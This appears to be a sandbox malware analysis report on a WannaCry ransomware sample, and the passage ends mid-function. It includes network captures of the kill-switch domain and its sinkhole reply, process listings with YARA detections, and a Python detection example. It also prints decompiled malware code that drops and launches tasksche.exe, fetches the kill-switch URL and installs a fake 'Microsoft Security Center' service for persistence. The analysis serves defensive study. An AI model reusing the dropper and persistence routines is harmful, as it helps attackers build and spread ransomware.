6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
          Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49700 | 104.16.173.80 | 80 | C:\Users\user\Desktop\MSNRf9dZ63.exe
Timestamp | kBytes transferred | Direction | Data
Oct 12, 2022 06:23:13.761401892 CEST | 90 | OUT | GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
Oct 12, 2022 06:23:13.791209936 CEST | 91 | IN | HTTP/1.1 200 OK
          Date: Wed, 12 Oct 2022 04:23:13 GMT
          Content-Type: text/html
          Content-Length: 607
          Connection: close
          Server: cloudflare
          CF-RAY: 758d0f17080b9a15-FRA
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
          Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
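The Snort hits and the two HTTP sessions above together show the whole kill-switch exchange: an A lookup for the domain, a bare GET / to it with no User-Agent, and the Kryptos Logic sinkhole answering 200. Below is an added example (not Joe Sandbox code and not from the sample) that reproduces the logic behind those three signatures (SIDs 2024291, 2024298 and 2031515) over constructed copies of the report's own DNS and HTTP data, and adds two checks worth doing by hand: that the body length matches Content-Length, so the capture is complete, and that the sinkhole's page title is present. The constants, inputs and function names are this example's own. One caveat the report itself supports: in the original WannaCry logic a successful fetch of the kill-switch URL makes the dropper exit, yet tasksche.exe is started at 06:23:13, after the first 200 reply at 06:23:12.54, so a reachable sinkhole must not be relied on as containment; the DNS lookup itself is the indicator to alert on.

```python
"""Triage of the kill-switch traffic captured in this report.

Added example for this report; it is not Joe Sandbox code and not part of
the sample. The inputs are constructed from values printed in the report:
the DNS queries, the request the dropper sent in HTTP session 0 and the
sinkhole's reply. The functions reproduce the logic behind the three Snort
hits (SIDs 2024291, 2024298, 2031515) and add the checks an analyst does by
hand.
"""

# Kill-switch domain and the sinkhole's page title, both taken from the report.
KILLSWITCH_DOMAIN = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
SINKHOLE_TITLE = "Sinkholed by Kryptos Logic"

# Constructed DNS query log as (src, dst, qname, qtype); fs.microsoft.com is
# the name the sandbox whitelisted and stands in for benign background noise.
DNS_QUERIES = [
    ("192.168.2.7", "8.8.8.8", KILLSWITCH_DOMAIN, "A"),
    ("192.168.2.7", "8.8.8.8", "fs.microsoft.com", "A"),
]

# Session 0 request and reply, re-joined with CRLF (the report prints one
# header per line). The body is the report's decoded "Data Ascii" line.
HTTP_REQUEST = (
    "GET / HTTP/1.1\r\n"
    f"Host: {KILLSWITCH_DOMAIN}\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
SINKHOLE_BODY = (
    '<!DOCTYPE html><html lang="en-us" class="no-js"><head>'
    '<meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title>'
    '<meta name="description" content="Kryptos Logic Sinkhole">'
    '<meta name="viewport" content="width=device-width, initial-scale=1.0">'
    '<link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/>'
    '</head><body class="flat"><div class="content"><div class="content-box">'
    '<div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1>'
    '<p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p>'
    '</div></div></body></html>'
)
HTTP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 12 Oct 2022 04:23:12 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 607\r\n"
    "Connection: close\r\n"
    "Server: cloudflare\r\n"
    "CF-RAY: 758d0f0f39c49b9e-FRA\r\n"
    "\r\n"
    + SINKHOLE_BODY
)


def parse_http(raw: str):
    """Split one HTTP/1.1 message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def dns_findings(queries):
    """SID 2024291 logic: an A query for the kill-switch name is a hit."""
    return [
        f"kill-switch DNS lookup from {src} via {dst}"
        for src, dst, qname, qtype in queries
        if qname.lower().rstrip(".") == KILLSWITCH_DOMAIN and qtype == "A"
    ]


def http_findings(request: str, response: str) -> dict:
    """SID 2024298 (request to the kill-switch domain) and SID 2031515
    (known sinkhole reply), plus two sanity checks on the capture."""
    start, req_hdrs, _ = parse_http(request)
    status, resp_hdrs, body = parse_http(response)
    code = int(status.split()[1])
    declared = int(resp_hdrs.get("content-length", "-1"))
    return {
        "killswitch_host": req_hdrs.get("host", "").lower() == KILLSWITCH_DOMAIN,
        "get_root": start.startswith("GET / HTTP/1."),
        # the report also flags "HTTP GET or POST without a user agent"
        "no_user_agent": "user-agent" not in req_hdrs,
        "status": code,
        "sinkhole_response": code == 200 and SINKHOLE_TITLE in body,
        # a truncated capture would make the body disagree with the header
        "body_complete": declared == len(body.encode("utf-8")),
    }


def verdict(queries, request, response) -> str:
    """Summarise the exchange the way an analyst would read it."""
    dns = dns_findings(queries)
    http = http_findings(request, response)
    if not dns and not http["killswitch_host"]:
        return "no kill-switch activity"
    if http["sinkhole_response"]:
        # In the original WannaCry logic a successful fetch makes the dropper
        # exit; this report shows tasksche.exe starting anyway, so alert on
        # the lookup itself rather than on whether the sinkhole answered.
        return "kill-switch domain resolved and fetched; sinkhole answered 200"
    return "kill-switch domain contacted; no sinkhole reply seen"


if __name__ == "__main__":
    print(dns_findings(DNS_QUERIES))
    print(http_findings(HTTP_REQUEST, HTTP_RESPONSE))
    print(verdict(DNS_QUERIES, HTTP_REQUEST, HTTP_RESPONSE))
```

To use it on real DNS and proxy logs, replace the constructed inputs with parsed records; the rstrip(".") in dns_findings is there because some resolvers log the fully qualified name with a trailing dot, and the host comparison is case-insensitive for the same reason.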


          Target ID:0
          Start time:06:23:11
          Start date:12/10/2022
          Path:C:\Users\user\Desktop\MSNRf9dZ63.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\MSNRf9dZ63.exe
          Imagebase:0x400000
          File size:6729728 bytes
          MD5 hash:1D38638153085A0A0F0A4F7174E52A9B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.247075924.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.247147186.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
          Reputation:low

          Target ID:1
          Start time:06:23:12
          Start date:12/10/2022
          Path:C:\Users\user\Desktop\MSNRf9dZ63.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\MSNRf9dZ63.exe -m security
          Imagebase:0x400000
          File size:6729728 bytes
          MD5 hash:1D38638153085A0A0F0A4F7174E52A9B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.249857244.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.249931141.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
          Reputation:low

          Target ID:2
          Start time:06:23:13
          Start date:12/10/2022
          Path:C:\Windows\tasksche.exe
          Wow64 process (32bit):false
          Commandline:C:\WINDOWS\tasksche.exe /i
          Imagebase:0x400000
          File size:3514368 bytes
          MD5 hash:7F7CCAA16FB15EB1C7399D422F8363E8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
          • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          • Detection: 98%, ReversingLabs
          • Detection: 89%, Metadefender, Browse
          Reputation:moderate

            C-Code - Quality: 86%
            			E00407CE0() {
            				void _v259;
            				char _v260;
            				void _v519;
            				char _v520;
            				struct _STARTUPINFOA _v588;
            				struct _PROCESS_INFORMATION _v604;
            				long _v608;
            				_Unknown_base(*)()* _t36;
            				void* _t38;
            				void* _t39;
            				void* _t50;
            				int _t59;
            				struct HINSTANCE__* _t104;
            				struct HRSRC__* _t105;
            				void* _t107;
            				void* _t108;
            				long _t109;
            				intOrPtr _t121;
            				intOrPtr _t122;
            
            				_t104 = GetModuleHandleW(L"kernel32.dll");
            				if(_t104 != 0) {
            					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
            					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
            					 *0x431460 = GetProcAddress(_t104, "WriteFile");
            					_t36 = GetProcAddress(_t104, "CloseHandle");
            					 *0x43144c = _t36;
            					if( *0x431478 != 0) {
            						_t121 =  *0x431458; // 0x772ef7b0
            						if(_t121 != 0) {
            							_t122 =  *0x431460; // 0x772efc30
            							if(_t122 != 0 && _t36 != 0) {
            								_t105 = FindResourceA(0, 0x727, "R");
            								if(_t105 != 0) {
            									_t38 = LoadResource(0, _t105);
            									if(_t38 != 0) {
            										_t39 = LockResource(_t38);
            										_v608 = _t39;
            										if(_t39 != 0) {
            											_t109 = SizeofResource(0, _t105);
            											if(_t109 != 0) {
            												_v520 = 0;
            												memset( &_v519, 0, 0x40 << 2);
            												asm("stosw");
            												asm("stosb");
            												_v260 = 0;
            												memset( &_v259, 0, 0x40 << 2);
            												asm("stosw");
            												asm("stosb");
            												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
            												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
            												MoveFileExA( &_v520,  &_v260, 1); // executed
            												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
            												_t107 = _t50;
            												if(_t107 != 0xffffffff) {
            													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
            													FindCloseChangeNotification(_t107); // executed
            													_v604.hThread = 0;
            													_v604.dwProcessId = 0;
            													_v604.dwThreadId = 0;
            													memset( &(_v588.lpReserved), 0, 0x10 << 2);
            													asm("repne scasb");
            													_v604.hProcess = 0;
            													_t108 = " /i";
            													asm("repne scasb");
            													memcpy( &_v520 - 1, _t108, 0 << 2);
            													memcpy(_t108 + 0x175b75a, _t108, 0);
            													_v588.cb = 0x44;
            													_v588.wShowWindow = 0;
            													_v588.dwFlags = 0x81;
            													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
            													if(_t59 != 0) {
            														CloseHandle(_v604.hThread);
            														CloseHandle(_v604);
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return 0;
            			}

            APIs
            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FFDFB10,?,00000000), ref: 00407CEF
            • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
            • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
            • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
            • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
            • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
            • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
            • sprintf.MSVCRT ref: 00407E01
            • sprintf.MSVCRT ref: 00407E18
            • MoveFileExA.KERNEL32 ref: 00407E2C
            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
            • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
            • CreateProcessA.KERNELBASE ref: 00407EE8
            • CloseHandle.KERNEL32(00000000), ref: 00407EF7
            • CloseHandle.KERNEL32(08000000), ref: 00407F02
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
            • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
            • API String ID: 1541710770-1507730452
            • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
            • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
            • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
            • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			_entry_(void* __ebx, void* __edi, void* __esi) {
            				CHAR* _v8;
            				intOrPtr* _v24;
            				intOrPtr _v28;
            				struct _STARTUPINFOA _v96;
            				int _v100;
            				char** _v104;
            				int _v108;
            				void _v112;
            				char** _v116;
            				intOrPtr* _v120;
            				intOrPtr _v124;
            				void* _t27;
            				intOrPtr _t36;
            				signed int _t38;
            				int _t40;
            				intOrPtr* _t41;
            				intOrPtr _t42;
            				intOrPtr _t49;
            				intOrPtr* _t55;
            				intOrPtr _t58;
            				intOrPtr _t61;
            
            				_push(0xffffffff);
            				_push(0x40a1a0);
            				_push(0x409ba2);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t58;
            				_v28 = _t58 - 0x68;
            				_v8 = 0;
            				__set_app_type(2);
            				 *0x70f894 =  *0x70f894 | 0xffffffff;
            				 *0x70f898 =  *0x70f898 | 0xffffffff;
            				 *(__p__fmode()) =  *0x70f88c;
            				 *(__p__commode()) =  *0x70f888;
            				 *0x70f890 = _adjust_fdiv;
            				_t27 = E00409BA1( *_adjust_fdiv);
            				_t61 =  *0x431410; // 0x1
            				if(_t61 == 0) {
            					__setusermatherr(E00409B9E);
            				}
            				E00409B8C(_t27);
            				_push(0x40b010);
            				_push(0x40b00c);
            				L00409B86();
            				_v112 =  *0x70f884;
            				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
            				_push(0x40b008);
            				_push(0x40b000); // executed
            				L00409B86(); // executed
            				_t55 =  *_acmdln;
            				_v120 = _t55;
            				if( *_t55 != 0x22) {
            					while( *_t55 > 0x20) {
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            					}
            				} else {
            					do {
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            						_t42 =  *_t55;
            					} while (_t42 != 0 && _t42 != 0x22);
            					if( *_t55 == 0x22) {
            						L6:
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            					}
            				}
            				_t36 =  *_t55;
            				if(_t36 != 0 && _t36 <= 0x20) {
            					goto L6;
            				}
            				_v96.dwFlags = 0;
            				GetStartupInfoA( &_v96);
            				if((_v96.dwFlags & 0x00000001) == 0) {
            					_t38 = 0xa;
            				} else {
            					_t38 = _v96.wShowWindow & 0x0000ffff;
            				}
            				_push(_t38);
            				_push(_t55);
            				_push(0);
            				_push(GetModuleHandleA(0));
            				_t40 = E00408140();
            				_v108 = _t40;
            				exit(_t40); // executed
            				_t41 = _v24;
            				_t49 =  *((intOrPtr*)( *_t41));
            				_v124 = _t49;
            				_push(_t41);
            				_push(_t49);
            				L00409B80();
            				return _t41;
            			}

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
            • String ID:
            • API String ID: 801014965-0
            • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
            • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
            • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
            • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E00408140() {
            				char* _v1;
            				char* _v3;
            				char* _v7;
            				char* _v11;
            				char* _v15;
            				char* _v19;
            				char* _v23;
            				void _v80;
            				char _v100;
            				char* _t12;
            				void* _t13;
            				void* _t27;
            
            				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
            				asm("movsb");
            				_v23 = _t12;
            				_v19 = _t12;
            				_v15 = _t12;
            				_v11 = _t12;
            				_v7 = _t12;
            				_v3 = _t12;
            				_v1 = _t12;
            				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
            				_t27 = _t13;
            				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
            				InternetCloseHandle(_t27); // executed
            				InternetCloseHandle(0);
            				E00408090();
            				return 0;
            			}

            APIs
            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
            • InternetCloseHandle.WININET(00000000), ref: 004081A7
            • InternetCloseHandle.WININET(00000000), ref: 004081AB
              • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
              • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
            Strings
            • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
            Memory Dump Source
            • Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
            • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
            • API String ID: 774561529-2942426231
            • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
            • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
            • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
            • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00407C40() {
            				char _v260;
            				void* _t15;
            				void* _t17;
            
            				sprintf( &_v260, "%s -m security", 0x70f760);
            				_t15 = OpenSCManagerA(0, 0, 0xf003f);
            				if(_t15 == 0) {
            					return 0;
            				} else {
            					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
            					if(_t17 != 0) {
            						StartServiceA(_t17, 0, 0);
            						CloseServiceHandle(_t17);
            					}
            					CloseServiceHandle(_t15);
            					return 0;
            				}
            			}

            APIs
            • sprintf.MSVCRT ref: 00407C56
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
            • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FFDFB10,00000000), ref: 00407C9B
            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
            • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
            • API String ID: 3340711343-4063779371
            • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
            • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
            • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
            • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E00408090() {
            				char* _v4;
            				char* _v8;
            				intOrPtr _v12;
